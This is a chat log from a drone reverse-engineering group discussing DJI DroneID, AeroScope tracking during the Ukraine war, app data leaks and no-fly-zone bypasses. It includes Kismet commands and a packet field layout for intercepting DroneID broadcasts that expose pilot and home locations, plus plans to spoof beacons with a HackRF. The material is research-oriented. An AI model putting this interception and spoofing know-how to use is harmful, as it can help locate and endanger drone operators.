@konraditurbe they will say "the UA gov doesn't want that, they wanna freely use drones" or some bullshit.
[2022-03-30 20:12:48]
konraditurbe :
Yep @faineg 2017-2018 was the golden era, so much good stuff
[2022-03-30 20:12:51]
faineg :
i thought it was the Ukrainian vice PM who brought it up https://twitter.com/FedorovMykhailo/status/1504068644195733504/photo/1
[2022-03-30 20:12:59]
hostile :
@konraditurbe I meant for troops... not using donations.
[2022-03-30 20:13:10]
faineg :
or i guess he implied but didn't actually say "NFZ"
[2022-03-30 20:13:48]
faineg :
@konraditurbe personally i'd be utterly shocked if they ever use a NFZ over this war
[2022-03-30 20:13:55]
konraditurbe :
Yeah, he asked for drone deactivation based on criteria, but not a NoFlyZone. a NFZ is the opposite, activate based on criteria
[2022-03-30 20:14:33]
faineg :
true, i suppose i'm mentally lumping them together - and indeed, last thing Ukraine wants is a blanket NFZ
[2022-03-30 20:14:36]
konraditurbe :
Can Russians use mastercard/visa? Because you can buy drone-hacks or nld to bypass NFZs, but doubt those companies will sell to Russians
[2022-03-30 20:15:12]
hostile :
I mean we can pretend they don't have access to our old duml work just the same
[2022-03-30 20:15:20]
faineg :
https://nolimitdronez.com/free-no-limit-dronez-license
[2022-03-30 20:15:24]
konraditurbe :
yep
[2022-03-30 20:15:27]
faineg :
thought they were giving them free to Russians too
[2022-03-30 20:15:44]
konraditurbe :
I was in their discord, they said they were vetting each one
[2022-03-30 20:15:53]
konraditurbe :
dont know how bulletproof that is
[2022-03-30 20:16:06]
faineg :
yeah, i assumed it'd be case by case, but i also question how bulletproof that is
[2022-03-30 20:16:14]
faineg :
https://www.reuters.com/business/finance/visa-suspends-operations-russia-over-ukraine-invasion-2022-03-05/
[2022-03-30 20:16:18]
faineg :
visa and mastercard are suspended
[2022-03-30 20:16:36]
konraditurbe :
well, they cant buy drone hacks, which supports the newer birds lol
[2022-03-30 20:17:03]
konraditurbe :
but as I said earlier, even a NFZ is only useful if you update your database, which you can skip, or just keep the tablet offline
[2022-03-30 20:17:11]
faineg :
oh yes, exactly
[2022-03-30 20:17:20]
faineg :
NFZ far as i'm concerned really only work for the dumb or lazy
[2022-03-30 20:17:53]
faineg :
keeps out a few actors but in a war with two technically competent sides...not going to do a fat lot of good
[2022-03-30 20:18:20]
konraditurbe :
Exactly
[2022-03-30 20:18:37]
faineg :
i make that point in the foreign policy piece i've got coming out hopefully in a couple days
[2022-03-30 20:18:58]
faineg :
trying to explain to the layman/non-drone-using crowd why it can be very dangerous to fly consumer drones in conflict zones
[2022-03-30 20:19:51]
faineg :
inspired by a few worrisome posts i've seen by that audience about how drones will make people safer without any apparent awareness of the drawbacks
[2022-03-30 20:22:13]
konraditurbe :
The sentiment among the volunteers for dji is good, since its allowing them to have advantage, but now with aeroscope being known its turning the tide.
[2022-03-30 20:23:24]
faineg :
one of those cases where i just want to make totally sure everyone involved knows the risks and the benefits
[2022-03-30 20:25:03]
faineg :
really good y'all are advising the UA guys on that stuff
[2022-03-30 20:25:31]
hostile :
lol semi related... going through my old receipts...
[2022-03-30 20:25:36]
hostile :
[2022-03-30 20:25:49]
faineg :
all of this generally makes me think it'd be good for this group to produce like a one-pager or a brochure that could easily be translated into multiple languages on basic "how not to get killed while flying a consumer drone" advice
[2022-03-30 20:25:53]
hostile :
[2022-03-30 20:25:56]
faineg :
so many people globally could probably stand to see that
[2022-03-30 20:26:15]
hostile :
there is one circulating in private now feine... and for opsec... it is kept private
[2022-03-30 20:26:21]
hostile :
in case there are flaws in the method
[2022-03-30 20:26:30]
hostile :
[2022-03-30 20:26:32]
faineg :
sensible
[2022-03-30 20:27:14]
hostile :
I think the photos above are the beginnings of the "Supervisor" program that I keep talking about that never existed, and MAY have evolved into flighthub (externally), and who knows what Internally.
[2022-03-30 20:27:15]
faineg :
i suppose a more general-advice document might be fine to disseminate widely, leaving out specifics (stuff like "airplane mode")
[2022-03-30 20:35:14]
faineg :
"with the goal of preserving all user data," eh
[2022-03-30 20:35:29]
konraditurbe :
There was a video that showed the pings to dji server made by dji go4, needs an update for dji fly
[2022-03-30 20:35:51]
faineg :
hmmm
[2022-03-30 20:36:28]
faineg :
let me know if you dig that up
[2022-03-30 20:37:28]
hostile :
We had this page back in the day. https://wiki.dji-rev.com/faq/dataleakage
[2022-03-30 20:37:35]
hostile :
https://wiki.dji-rev.com/faq/dataleakage/chatter
[2022-03-30 20:37:45]
hostile :
video linked on second page.
[2022-03-30 20:38:02]
hostile :
we need to update that
[2022-03-30 20:38:08]
hostile :
for DJi Fly
[2022-03-30 20:38:11]
faineg :
hah, i had no idea about the KMs flown thing, jesus
[2022-03-30 20:38:57]
faineg :
the skypixel thing also, wtf
[2022-03-30 20:40:35]
konraditurbe :
skypixel is their photo sharing site, you can upload your photos/panoramas to it. Its optional to upload.
[2022-03-30 20:41:28]
konraditurbe :
Also, is DJI Fly not in the play store due to secneo or due to them being on the US Commerce entity list / various naughty lists?
[2022-03-30 20:41:55]
faineg :
oh yeah i know about skypixel, just didn't see the thing about automatically uploading if you use the in-app FB button
[2022-03-30 20:42:03]
faineg :
or rather hadn't seen it before
[2022-03-30 20:42:16]
hostile :
nah Dji Fly is in the play store...
[2022-03-30 20:42:23]
hostile :
I'm using it on my M1 to disassemble
[2022-03-30 20:42:57]
faineg :
i've been buying DJI products since 2013 so i've followed the full saga, albeit not cracking it open and looking inside to the extent y'all have
[2022-03-30 20:42:59]
hostile :
[2022-03-30 20:43:03]
konraditurbe :
@
[2022-03-30 20:43:12]
konraditurbe :
play store for android
[2022-03-30 20:43:31]
hostile :
ahhhhh my bad yeah they got kicked off at some point I think cuz sec neo
[2022-03-30 20:43:33]
hostile :
I forget
[2022-03-30 20:43:34]
konraditurbe :
You have to go to their site to get the dji fly apk
[2022-03-30 20:43:37]
faineg :
huh, weird
[2022-03-30 20:43:49]
konraditurbe :
Fuckers would rather inconvenience their customers
[2022-03-30 20:44:09]
konraditurbe :
had several friends who picked up mavics and minis be super confused why they had to download an apk
[2022-03-30 20:44:31]
hostile :
https://www.dji.com/ca/downloads/djiapp/dji-fly iirc
[2022-03-30 20:45:19]
hostile :
```There is a chance that the DJI Fly app isn’t updated on the Play Store. Google announced a while back that app developers will have to ensure their apps are packaged as bundles (AAB) rather than the standard APK. According to a DroneDJ reader, DJI’s SDK has a bug that prevents it from compiling in this new AAB standard.```
[2022-03-30 20:45:24]
hostile :
https://dronedj.com/2021/01/27/latest-dji-fly-android-app-only-available-from-djis-website-not-the-play-store/
[2022-03-30 20:45:36]
konraditurbe :
Hehe, has to be old secneo
[2022-03-30 20:45:57]
hostile :
yeah my assumption too
[2022-03-30 20:46:36]
konraditurbe :
what other apps use dji's secneo implementation?
[2022-03-30 20:46:58]
hostile :
dji didn't implement it
[2022-03-30 20:47:06]
hostile :
Bangcle did. LOTS of sketchy apps and malware use it
[2022-03-30 20:47:25]
hostile :
hence why it is so expensive for folks like Diff to give us free time to decrypt it
[2022-03-30 20:47:41]
hostile :
https://www.linkedin.com/company/secneo-co-ltd/about/
[2022-03-30 20:50:35]
faineg :
btw regarding drone safety, this NGO specializes in giving advice to people about tech-self-defense strategies and might be good to talk to at some point about incorporating basic drone advice into their resources - https://tacticaltech.org/
[2022-03-30 20:50:55]
faineg :
they do good work but i don't think anyone over there knows much about drones as i recall
[2022-03-30 20:51:13]
konraditurbe :
wonder what secneo being HQ'd in california will mean for them and DJI in the future. https://www.shine.cn/biz/tech/2203143106/
[2022-03-30 20:52:09]
konraditurbe :
Oh they have an office in Beijing lol
[2022-03-30 20:57:58]
hostile :
lol found some older supervisor documents... seems to imply it has some ancestry with AeroScope management interface
[2022-03-30 20:58:28]
hostile :
[2022-03-30 20:58:42]
hostile :
[2022-03-30 20:58:55]
hostile :
[2022-03-30 20:59:10]
hostile :
[2022-03-30 20:59:27]
hostile :
[2022-03-30 21:01:18]
konraditurbe :
nice find!!
[2022-03-30 21:01:55]
hostile :
Yup some of the wording matches. Supervisor may have been an early mix of AeroScope & FlightHub *internally*. (my guess).
[2022-03-30 21:02:02]
hostile :
[2022-03-30 21:02:28]
hostile :
also note the version number in that doc is 1.5.0
[2022-03-30 21:03:40]
hostile :
lol at the shit in the same folder as this in the AWS dump.
[2022-03-30 21:14:45]
mainframe :
Meanwhile I have looked more into it - and it appears that Autel Explorer app sends map center point - and it will send it again when it changes (or every ~20s if it does not change). App map center point change is triggered either by drone tracking on the map or when user is scrolling map manually. Data sent can probably be linked to unique ID - which may be linked to your Autel account (also when you are not logged in atm). This part is not yet verified - but there is persistent ID - even when not logged into app.
[2022-03-30 21:26:20]
konraditurbe :
Yeah the ID stuff is concerning, as it can be quite invasive when the user is not logged in.
[2022-03-30 21:32:43]
faineg :
ugh
[2022-03-30 21:32:47]
faineg :
disturbing
[2022-03-30 23:06:12]
hostile :
guys relax! It's just marketing data to tell where the sales are hype. ;)
[2022-03-30 23:06:23]
hostile :
(kinda line DJI gives me when I push them in private)
[2022-03-30 23:52:41]
hostile :
so China is all super restrictive eh?
[2022-03-30 23:52:45]
hostile :
[2022-03-30 23:53:03]
hostile :
make sure your Real Name and SMS are tied to your drone flights
[2022-03-31 00:16:07]
hostile :
lets see if DJI Pilot did it too.
[2022-03-31 00:41:56]
w4ts0n :
w4ts0n joined the channel.
[2022-03-31 00:45:38]
dkovar :
That video is highly suspect. There is a lot of UAV related disinformation coming out of Ukraine.
[2022-03-31 00:47:46]
dkovar :
If you want to collect sensitive information around refugee camps, build your own UAV, or have your org support an org standard one. Doesn't come with DJI baggage, you don't need most of their features, and you can do field repairs on it, and it'll cost you less money.
[2022-03-31 01:39:03]
fredmicrowave :
The problem with homemade drones is the video link. Available DIY systems are not encrypted, so you end up with an open feed that anyone can see, including where you take off or land... Especially if you have OSD flight data in it.
[2022-03-31 01:47:44]
hostile :
not a problem
[2022-03-31 01:47:59]
hostile :
you can get an ArtySyn dev kit just like DJI did and make your own LightBridge with ease.
[2022-03-31 01:48:22]
hostile :
you can also add encryption to DIY work historically HAM ops avoid it cuz they find liability in regulation
[2022-03-31 01:50:16]
hostile :
but yes. requires some effort and many folks are lazy or not technical enough
[2022-03-31 01:50:22]
hostile :
want spoon fed / hand held
[2022-03-31 01:52:10]
hostile :
https://github.com/rodizio1/EZ-WifiBroadcast
[2022-03-31 01:52:20]
hostile :
this came out years ago... completely usable
[2022-03-31 03:22:21]
rflagg :
rflagg joined the channel.
[2022-03-31 03:26:37]
hostile :
Lets fucking gooooooo!!!!!!!!!
[2022-03-31 03:26:49]
hostile :
[2022-03-31 03:26:56]
hostile :
I'm back bitches.
[2022-03-31 04:31:41]
hostile :
so it looks like Kismet stopped using the old KaiTai definitions and moved to a proper parser for DroneID packets.
[2022-03-31 04:31:57]
hostile :
https://github.com/kismetwireless/kismet/blob/master/dot11_parsers/dot11_ie_221_dji_droneid.cc
[2022-03-31 04:32:04]
hostile :
https://github.com/kismetwireless/kismet/blob/master/dot11_parsers/dot11_ie_221_dji_droneid.h
[2022-03-31 04:33:32]
hostile :
sudo kismet -c youwifi0:channels=\"140W5,149W5,153W5,157W5,161W5\" worked for MR1SS5 the Mini SE in North America in 5ghz only mode. (5.725-5.850 GHz)
[2022-03-31 04:35:03]
hostile :
sudo kismet -c youwifi0:channels=\"140W5,149W5,153W5,157W5,161W5,1W5,2W5,3W5,4W5,5W5,6W5,7W5,8W5,9W5,10W5,11W5,12W5,13W5\" for MR1SD25 (adds 2.400-2.4835 GHz, 5.725-5.850 GHz)
[2022-03-31 04:35:46]
hostile :
https://www.dji.com/mini-se/specs
[2022-03-31 04:36:12]
hostile :
[2022-03-31 04:37:28]
hostile :
Same channel set should cover the Spark
[2022-03-31 04:39:13]
hostile :
Also the Air
[2022-03-31 04:39:15]
hostile :
[2022-03-31 04:40:57]
hostile :
Looks like all series will be covered by that channel set
[2022-03-31 04:40:59]
hostile :
[2022-03-31 04:42:18]
hostile :
Using a known good QCNFA222 M2 card.
[2022-03-31 04:47:12]
hostile :
so to get DroneID support back in Kismet, this is gonna need to be edited https://github.com/kismetwireless/kismet/blob/master/conf/kismet_uav.conf.yaml#L90
[2022-03-31 05:21:38]
hostile :
https://dji-rev.com/dji-rev/pl/sxn789ifyf87xr6mob8zodxkpo
[2022-03-31 05:21:48]
hostile :
the link still insta pops open cuz of WEP =]
[2022-03-31 06:00:30]
hostile :
https://dji-rev.com/dji-rev/pl/b86899noi7nxmf868tmouye6aw
[2022-03-31 06:05:39]
hostile :
Also I think we've got clean drone ID packets.
[2022-03-31 06:05:42]
hostile :
[2022-03-31 06:18:45]
hostile :
https://twitter.com/d0tslash/status/1509414290922614784?s=20&t=H1ERiNiL-t4xQ7MLELWB-Q
[2022-03-31 07:21:21]
hostile :
here's a better view of the actual Vendor Specific IE tag
[2022-03-31 07:21:37]
hostile :
you can clearly see my serial number in plain text
[2022-03-31 07:22:19]
hostile :
the "Vendor Specific Data" is the DroneID packet that needs parsed
[2022-03-31 11:06:41]
konraditurbe :
https://www.forbes.com/sites/thomasbrewster/2022/03/31/dji-drones-become-vital-tool-in-ukraine-resistance/?sh=4fc73dba79e6
[2022-03-31 11:27:57]
konraditurbe :
As it's been said earlier, drone that snitches on you to nearby aeroscopes > no drone at all.
[2022-03-31 11:41:20]
fredmicrowave :
I agree it can be done relatively easily, but what I mean is that it's not so easy to be done quickly, especially during a war, when you need images quickly instead of learning how to program boards you don't have and build drones.
[2022-03-31 11:43:00]
fredmicrowave :
EZ wifibroadcast is really cool btw
[2022-03-31 14:15:35]
skyninja :
The Kismet / Anatomy of drone id doc have version 1 of the drone id packet. Newer models have version=2, that includes appGPSTime,appGPSLongitude,appGPSLatitude
[2022-03-31 14:33:45]
skyninja :
here is a parser in python, reads a pcap file, outputs human readable drone ids.
[2022-03-31 15:02:03]
hostile :
re: Capability in China, this is interesting. https://www.caac.gov.cn/en/HYYJ/NDBG/201802/P020180227616856973062.pdf
[2022-03-31 15:08:24]
hostile :
so is there a v3 packet that includes pilot location too?
[2022-03-31 15:08:54]
tmbinc :
What is this TFR thing by the way? Seems some chinese-only online NFZ system. Or is that what the diagram shows?
[2022-03-31 15:09:13]
hostile :
DJI app can pull TFR shit now IIRC
[2022-03-31 15:09:42]
hostile :
but yeah I think some of the Supervisor program got converted into FlightHub, and they used it internally for CAAC monitoring
[2022-03-31 15:10:04]
hostile :
so both product, and internal tool that they totally never run on volunteered flight logs
[2022-03-31 15:10:47]
tmbinc :
Mini2 has version=2 and includes pilot (app) location
[2022-03-31 15:11:19]
tmbinc :
what else would "pilot" location be?
[2022-03-31 15:26:51]
hostile :
home loc, current pilot loc (cell phone gps location), and drone loc
[2022-03-31 15:36:34]
hostile :
errrr uhhhhhh
[2022-03-31 15:36:36]
hostile :
[2022-03-31 15:36:45]
hostile :
Note CAAC requests ability to send drones management commands.
[2022-03-31 15:37:08]
hostile :
and depicts a "drone performing a return operation according to the management command"
[2022-03-31 15:37:14]
hostile :
they remotely issue an RTH ?
[2022-03-31 15:46:02]
hostile :
@skyninja for some reason your script just hangs. Not sure scapy is reading the pcap properly
[2022-03-31 15:46:05]
hostile :
```
$ python3 droneid.py --raw dump.pcap
WARNING: No IPv4 address found on anpi1 !
WARNING: No IPv4 address found on anpi0 !
WARNING: more No IPv4 address found on en3 !
```
[2022-03-31 15:46:39]
dkovar :
Or, remotely issue a "go anywhere we want"....
[2022-03-31 15:46:41]
hostile :
oh wait just took for ever to load
[2022-03-31 15:49:37]
skyninja :
by the way, same parser as for Ocusync, except the droneid packets are enclosed by a length field at the start and a CRC16 at the end.
[2022-03-31 15:51:19]
hostile :
values def need adjusted.
[2022-03-31 15:51:23]
hostile :
[2022-03-31 15:51:41]
hostile :
I suspect there is a 3rd version of the packet.
[2022-03-31 15:57:35]
skyninja :
apsGPSLongitude looks a bit funny, but otherwise seems ok.
[2022-03-31 16:00:42]
skyninja :
i know what the problem is, you are in the US, and that has a negative longitude. It's a signed/unsigned thing.
[2022-03-31 16:02:58]
skyninja :
now with support for people in the US (-:
[2022-03-31 16:23:35]
hostile :
that looks better @skyninja
[2022-03-31 16:23:39]
hostile :
[2022-03-31 16:25:41]
hostile :
that properly shows home loc, app loc, and drone loc
[2022-03-31 16:28:40]
skyninja :
Now everybody knows where you live (-:
[2022-03-31 16:33:39]
hostile :
I don't give a shit
[2022-03-31 16:33:42]
hostile :
it's no secret
[2022-03-31 16:33:50]
hostile :
google my name... address readily available
[2022-03-31 16:34:07]
w0h :
No one will dare to visit him when there is a swarm of kamikaze Mini SEs on the radar, not knowing which are real and which are not :D
[2022-03-31 16:34:26]
hostile :
like literally if someone can't dox me, they are a fucking idiot. https://www.medicalmarijuana.ohio.gov/Documents/DispensaryApplications/Southeast%203/HEALING%20III%20-%20Application%20ID-815.pdf
[2022-03-31 16:36:45]
konraditurbe :
suddenly, parked outside hostile's house...
[2022-03-31 16:36:55]
hostile :
LOLOLOLOOOOLOLOLOLOLOL
[2022-03-31 16:37:01]
hostile :
please tweet that so I can RT
[2022-03-31 16:44:22]
dkovar :
Sweet.
[2022-03-31 21:54:59]
hostile :
@skyninja looking at your code vs old kismet code... did they remove roll, pitch, yaw, heading from the packet structure? or did you just not include it? Appears some fields were rearranged, not just appended to.
[2022-03-31 21:55:03]
hostile :
[2022-03-31 22:18:56]
tmbinc :
I think pitch is still there but roll/yaw has been replaced with app_time (42..45), app_lon (46..49), app_lat (50..54) right?
[2022-03-31 22:19:12]
tmbinc :
(at least that's what I got from mini2 firmware)
[2022-03-31 22:19:39]
tmbinc :
sorry not sure what 40..41 actually is. Some angle but could be yaw, pitch or roll, dunno
[2022-03-31 22:19:51]
hostile :
I have several sets of inconsistent notes I can't recall who gave me this.
[2022-03-31 22:20:02]
hostile :
[2022-03-31 22:20:30]
tmbinc :
app_time is only 4 bytes on mini2
[2022-03-31 22:20:46]
hostile :
[2022-03-31 22:22:53]
tmbinc :
ok maybe I'm off here in my disassembly
[2022-03-31 22:23:19]
hostile :
I forget this coming from FC, or from the .ko?
[2022-03-31 22:24:04]
hostile :
I didn't get to decompiling the FC module we discussed yet. Wasn't interested in entrypoint games, and processor selection fuckery yet. =]
[2022-03-31 22:26:09]
tmbinc :
FC
[2022-03-31 23:39:41]
glados :
glados joined the channel.
[2022-03-31 23:49:18]
hostile :
I think this is the format of the changes needed for kismet
[2022-03-31 23:49:30]
hostile :
```
m_version = p_io->read_u1();
m_seq = p_io->read_u2le();
m_state_info = p_io->read_u2le();
m_product_type = p_io->read_u1();
m_serialnumber = p_io->read_bytes(16);
m_raw_lon = p_io->read_s4le();
m_raw_lat = p_io->read_s4le();
m_height = p_io->read_s2le();
m_altitude = p_io->read_s2le();
m_raw_app_time = p_io->read_s8le();
m_raw_app_lon = p_io->read_s4le();
m_raw_app_lat = p_io->read_s4le();
m_raw_home_lon = p_io->read_s4le();
m_raw_home_lat = p_io->read_s4le();
m_product_type = p_io->read_u1();
m_uuid_len = p_io->read_u1();
m_uuid = p_io->read_bytes(uuid_len());
```
[2022-04-01 06:52:36]
skyninja :
I just did not include vnorth/veast/vup/roll/pitch/yaw. I do not use them and it is difficult to test if the values are correct. Yaw would be useful, so you have a heading if you plot a drone on a map.
[2022-04-01 06:55:25]
skyninja :
for kismet you should have a switch on m_version. If you have version 1, do what is already implemented in kismet. If you have version 2, do the thing with appgps in it. I do not have version 1 samples, so I cannot test it. I assume the Lightbridge drones have version 1.
[2022-04-01 06:56:35]
skyninja :
for version 2, between your m_altitude and m_raw_app_time, there are some bytes.
[2022-04-01 07:00:49]
skyninja :
and for appgps lat/lon, latitude comes first, then longitude. That is different order than home and drone lat/lon. No 1 April joke.
[2022-04-01 07:02:41]
skyninja :
and there is no m_product_type between state and serial.
[2022-04-01 08:37:24]
finnik :
finnik joined the channel.
[2022-04-01 10:57:17]
kon :
kon joined the channel.
[2022-04-01 14:51:43]
hostile :
@skyninja do you know the field positions for the roll pitch yaw, even if you are not using them. I'd like all the fields mapped properly, not just to assume they are not useful to someone
[2022-04-01 15:03:36]
skyninja :
nope
[2022-04-01 15:19:12]
hostile :
we'll have to get one of the FC modules decompiled again to confirm
[2022-04-02 04:40:46]
hostile :
slow progress this eve.
[2022-04-02 04:40:48]
hostile :
https://dji-rev.com/dji-rev/pl/g35t78dh4tr13jnmz16rjeb6ia
[2022-04-02 04:40:59]
hostile :
[2022-04-02 05:42:59]
skyninja :
what are you trying to do? transmit spoofed beacons with gr-ieee802 and a HackRF?
[2022-04-02 05:43:30]
hostile :
that's next...
[2022-04-02 05:43:48]
hostile :
then occusync variant
[2022-04-02 05:44:24]
hostile :
both rx / tx methods need written up. made easy to put into peoples hands that need it right now
[2022-04-02 07:34:08]
hotelzululima :
time for some "crybaby" devices :)
[2022-04-02 07:37:43]
hotelzululima :
OpenPilot for the win
[2022-04-02 08:02:32]
hostile :
@hotelzululima if you get bored... https://www.nxp.com/design/development-boards/i-mx-evaluation-and-development-boards/i-mx-rt1060-evaluation-kit:MIMXRT1060-EVK
[2022-04-02 16:29:38]
hotelzululima :
hmm ok.. just getting back into this after hibernating on this front ..I know you are directing me this way for a reason.. :) reason?(for folks like moi lacking a clue)
[2022-04-02 16:33:38]
hostile :
@hotelzululima https://github.com/o-gs/dji-firmware-tools/wiki/WM160-Main-Processing-Core-Board
[2022-04-02 16:33:59]
hostile :
[2022-04-02 16:36:00]
dkovar :
One possible consequence of the "AeroScopes in Ukraine" issue and the work being done here is that DJI might consider turning on RemoteID and turning off DroneID.
https://ursainc.com/2022/04/02/supporting-remoteid-offers-dji-a-simple-off-ramp-from-the-thorny-issue-of-aeroscopes-in-combat-zones/
If you are concerned that this is click bait, here is the text:
"What If … DJI Replaces Their DroneID with RemoteID? Supporting RemoteID offers DJI a simple off ramp from the thorny issue of AeroScopes being used in combat zones or for unintended use cases.
On September 16th, 2022 “Drone manufacturers must comply with the final (RemoteID) rule’s requirements for them.”
What would happen if DJI “simply” replaced their current DroneID approach that supports AeroScope with RemoteID data … and turns off DroneID data? There is no simple “on/off” switch to do this but the process and roadmap for it seems relatively straightforward.
DJI would immediately a) be compliant with RemoteID requirements, b) no longer need to support what appears to be an end of life product and c) essentially eliminate the value of all existing AeroScope units. Due to the rollout timeline and carve outs for existing drones AeroScope units will continue to provide value for a while but that value will rapidly diminish while the value of a simple RemoteID sensor will rapidly increase.
What is DJI’s incentive for continuing to support DroneID and thus AeroScope units and their capabilities? They will certainly earn good will from the CUAS integrators using AeroScope and those integrator’s clients until RemoteID is fully rolled out. On the other hand they will no longer earn ill will from those who object to DroneID. DJI drones and AeroScope units that can detect their operators became a very hot topic due to their use on both sides of the war in Ukraine. Being able to disable DroneID might offer a neat off ramp from a very thorny issue.
Many of us are watching the RemoteID (and the EU version) with great interest. Anyone selling or using AeroScope units may want to factor RemoteID’s timeline into their plans and budgets."
[2022-04-02 16:59:29]
hotelzululima :
As I suspected.. why this and not a core board(like we used on the Mavic Pro?(shortage of core boards?))
[2022-04-02 18:43:08]
skyninja :
Direct remote id must be wi-fi or bluetooth. How should DJI do that for Ocusync and Lightbridge based drones? Some have also a wi-fi chip, but maybe not all. Mavic 3 already has wifi chip for this purpose.
[2022-04-02 19:13:20]
fredmicrowave :
Probably no one in Ukraine is going to update their drones in the short term.
[2022-04-02 20:26:49]
tmbinc :
If their SDR is as much SDR as they claim (and at least P1-based devices should have a freely programmable DSP for TX), then they should be able to modulate the wifi packet in software.
[2022-04-02 20:27:23]
tmbinc :
With Wifi chip is probably not trivial due to coexistence requirement, I wonder how they do this on Mavic 3
[2022-04-02 20:27:29]
tmbinc :
but of course doable
[2022-04-02 20:27:46]
tmbinc :
mini2 already has wifi + sdr, but only static switching
[2022-04-02 20:50:01]
skyninja :
I always assumed that "sdr" was a sort of product name, but they use an LTE chip for ocusync, but is not software defined at all. They had FPGA + Analog Devices RF transceiver for the first generation of Lightbridge, but they went to a Chinese ASIC for later version. I assumed that an FPGA + RF transceiver is too expensive for mass produced product.
[2022-04-02 20:51:53]
skyninja :
Mavic 3: probably wi-fi soc dedicated to transmitting drone id??
[2022-04-02 20:52:56]
skyninja :
For your DIY drone you can use an ESP32 soc for transmitting drone id.
[2022-04-02 21:06:35]
hostile :
"chinese ASIC" aka Artosyn for LightBridge
[2022-04-02 21:08:09]
hostile :
@skyninja photo of what Mavic 3 uses here: https://dji-rev.com/dji-rev/pl/4niihxg8eigntdp8rzxmxrum6r
[2022-04-02 21:09:44]
skyninja :
yes that picture yes.
[2022-04-02 21:30:57]
fredmicrowave :
If so, would be so easy to disable drone id on M3 by just disconnecting the antennas connectors...
[2022-04-03 06:55:36]
skyninja :
from the teardown videos i do not see an obvious antenna cable being disconnected. i do not know. haven't verified myself that this is a wifi module.
[2022-04-03 13:27:04]
fredmicrowave :
It's hard to see on the video, but the antennas could be printed on the PCB, on each side of the module. There is enough of what looks like unpopulated pcb left for that, which would be unusual if it had no purpose.
[2022-04-03 13:35:25]
fredmicrowave :
I have found another video, definitely printed antennas!:
https://www.youtube.com/watch?v=ixM7qB0NGkc&t=150s
Since it is on top, could also be ADS-B receiver I suppose.
[2022-04-03 13:36:17]
fredmicrowave :
At around 2:30
[2022-04-03 13:42:26]
fredmicrowave :
It's hard to tell since there is no scale for comparison, but those antennas look larger than usual wifi ones. Since freq is 1090 vs Wifi 2400, that is probably the ads-b RX ...
[2022-04-03 13:48:59]
fredmicrowave :
There are also two more antennas on the upper shell that connect to the GPS board, but I doubt they are GPS.
[2022-04-03 13:59:51]
tmbinc :
Those are ADS-B I think?
[2022-04-03 14:01:53]
tmbinc :
ADS-B receiver is near the GPS typically (at least on Air2/Air2S it was)
[2022-04-03 14:02:10]
tmbinc :
The first photo looks like bluetooth/wifi (does it have BT? Don't know)
[2022-04-03 14:08:12]
tmbinc :
BTW if anyone is interested in ADS-B firmware, I recently discovered the key for it.
[2022-04-03 14:47:29]
hostile :
Imma start calling you the damn keymasta
[2022-04-03 14:53:36]
skyninja :
dank keymasta
[2022-04-03 14:54:58]
skyninja :
(i do not know what "dank" means, not a native speaker, it is probably slang, but you say it all the time)
[2022-04-03 14:56:08]
skyninja :
ads-b sounds logical, because those signals, like gps, come from above and this is on top.
[2022-04-03 15:01:43]
ronykom :
ronykom joined the channel.
[2022-04-03 15:02:14]
hostile :
mix between these two @skyninja
[2022-04-03 15:02:15]
hostile :
[2022-04-03 15:02:30]
hostile :
[2022-04-03 15:02:53]
hostile :
@tmbinc's keys are indeed dank. Potent and of the highest quality. =]
[2022-04-03 15:04:50]
hostile :
or Cheese... fine cheese can also be dank. You look at it, it is moldy, smells like shit, but you know it is the finest of quality cheese, literally because of that dank smell. It is an interesting word!
[2022-04-03 15:05:16]
hostile :
it implies both nasty, and high quality at the same time. Quite confusing for someone to consider something nasty to be the highest of quality.
[2022-04-03 15:05:53]
hostile :
*potent* is perhaps the best word encompassing it all.
[2022-04-03 15:12:47]
skyninja :
thanks for the language lesson, i learn something every day ?
[2022-04-03 15:57:21]
stanlee :
https://www.youtube.com/watch?v=UZXzMUxfR6c
[2022-04-03 16:00:45]
hostile :
[2022-04-03 16:01:34]
hostile :
this video has been shown over and over and over, but has a date of 2016. It may indeed show the dangers of EW groups and signal intelligence, but it is not conclusive in any way related to Aeroscope, or DroneID broadcasts
[2022-04-03 16:21:28]
the_lord :
probably the date and time are incorrect, in September 2016 the MP was not released yet
[2022-04-03 16:22:43]
stanlee :
Understood
[2022-04-03 17:09:11]
hostile :
that said, I've had several folks reach out in private begging for help claiming .ru had integrated aeroscope logic into their shelling / strike capability.
[2022-04-03 17:21:57]
skyninja :
"integrated" is most likely the swivel chair interface ?
[2022-04-03 17:38:51]
the_lord :
I had to disassemble brand new M3 to take these pictures ?
[2022-04-03 17:42:12]
skyninja :
https://www.youtube.com/watch?v=mT5FKNQ2Fg8
[2022-04-03 17:43:54]
skyninja :
@the_lord the background proves they are recent pictures (-:
[2022-04-03 17:46:07]
the_lord :
;)
[2022-04-03 17:47:09]
the_lord :
?
[2022-04-03 17:48:44]
the_lord :
the GPS antenna is too thin, maybe for that it takes long time to get GPS fix
[2022-04-03 17:49:33]
the_lord :
[2022-04-03 17:49:42]
the_lord :
About 2mm
[2022-04-03 17:56:02]
hostile :
ground plane will get ya too.
[2022-04-03 17:56:22]
hostile :
notorious fail in ublox board design by rookies. (like 3dr)
[2022-04-03 17:57:23]
hostile :
https://blog.antenova.com/ground-plane-design-for-gnss-trackers
[2022-04-03 17:58:29]
hostile :
shit we knew back in 2015
[2022-04-03 17:58:30]
hostile :
https://diydrones.com/profiles/blogs/u-blox-m8n-ground-planes-antennas-and-positional-accuracy
[2022-04-03 17:58:41]
hostile :
```
A larger ground plane results in higher accuracies.
```
[2022-04-03 17:59:37]
hostile :
god I remember 3dr was soooo bad. you could clearly see it in testing.
[2022-04-03 17:59:39]
hostile :
[2022-04-03 17:59:53]
hostile :
looks like a fucking octopus running across the slides
[2022-04-03 18:09:10]
the_lord :
I think I’ll replace the antenna with MP one and compare
[2022-04-03 19:12:33]
the_lord :
A quick test showed it's faster than stock, need to compare with a stock drone at the same location and time the 3D fix
[2022-04-03 21:19:02]
fredmicrowave :
Great pictures @the_lord . The antenna is thin but looks large. (They say the last firmware helped a lot for faster GPS fix.)
Good to know that the side antennas are for ADS-B, so the module could be Wifi ... a bit strange if it's for droneid to place it on top, but they may have had no other place left.
[2022-04-03 21:26:02]
the_lord :
the module IS WiFi, it's written on the cable
the WiFi is not only for droneID, it is used for quick transfer as well
[2022-04-03 21:27:47]
fredmicrowave :
Lol, Ok i missed that.
[2022-04-04 01:28:49]
dkovar :
Not sure how this might be useful, but apparently AeroScope is known as "Cloud Whistle" in China - https://inf.news/en/world/78c9615387a7515da0c37e72321cb2b2.html
(See paragraph under first picture.)
[2022-04-04 01:57:32]
hostile :
things are happening.
